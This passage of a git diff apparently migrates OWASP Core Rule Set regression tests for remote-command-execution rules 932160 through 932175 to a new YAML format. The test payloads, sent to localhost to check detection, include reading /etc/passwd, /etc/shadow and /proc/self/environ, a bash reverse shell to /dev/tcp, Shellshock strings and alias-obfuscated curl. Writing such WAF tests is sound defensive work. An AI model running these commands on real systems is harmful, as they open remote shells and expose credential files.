text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932160-1=cat%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=/usr/bin/python3 -m http.server" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=/usr/bin/python3 -m http.server" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932160] + - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-7 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'sentence=The zip on my coat is stuck' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-8 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'sentence=The zip on my coat is stuck' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932160] + - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - uri: "/post" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=/bin/ab' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-9 + - input: + dest_addr: "127.0.0.1" + method: "POST" + uri: "/post" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=/bin/ab' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=$SHELL -c "echo hi" - uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=$SHELL -c "echo hi" + uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=${SHELL} -c "echo hi" - uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=${SHELL} -c "echo hi" + uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/ansible" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/ansible" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 12 desc: "Positive test: Match against bin/chef" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/chef" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/chef" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/cscli" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/cscli" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/visudo" - version: HTTP/1.0 - output: - log_contains: id "932160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/visudo" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 816c0c269..112069387 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -1,192 +1,191 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: "932161.yaml" +rule_id: 932161 tests: - - test_title: 932161-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 10 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 11 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 12 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 7abbc9c97..837b9b15c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml @@ -2,24 +2,23 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932170.yaml +rule_id: 932170 tests: - - test_title: 932170-1 + - test_id: 1 desc: "Test for '() {' in request header test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Test: () { - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Test: () { + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932170] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 71572eddb..4f1721ed8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml @@ -2,40 +2,39 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932171.yaml +rule_id: 932171 tests: - - test_title: 932171-1 + - test_id: 1 desc: "Test for '() {' in ARGS_NAMES" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" - - test_title: 932171-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%28%29%20%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [932171] + - test_id: 2 desc: "Test for '() {' in ARGS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%28%29%20%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [932171] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index 790b5740a..44ab3f124 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml @@ -2,272 +2,271 @@ meta: author: "Felipe Zipitria, azurit" description: "Remote Command Execution: shell aliasing detection" - enabled: true - name: 932175.yaml +rule_id: 932175 tests: - - test_title: 932175-1 + - test_id: 1 desc: "Test for 0FA9HCGT alias eennvv=env&eennvv whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 2 desc: "Test for alias with shell tricks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias a=c${KK}url&a google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias a=c${KK}url&a google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 3 desc: "Test for alias name with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias 'letter'=curl&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias 'letter'=curl&letter google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 4 desc: "Test for alias name with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias "quote"=curl"e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias "quote"=curl"e google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 5 desc: "Test for alias value with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias alias='curl'&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias alias='curl'&letter google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 6 desc: "Test for alias value with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias double="curl""e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias double="curl""e google.com + version: 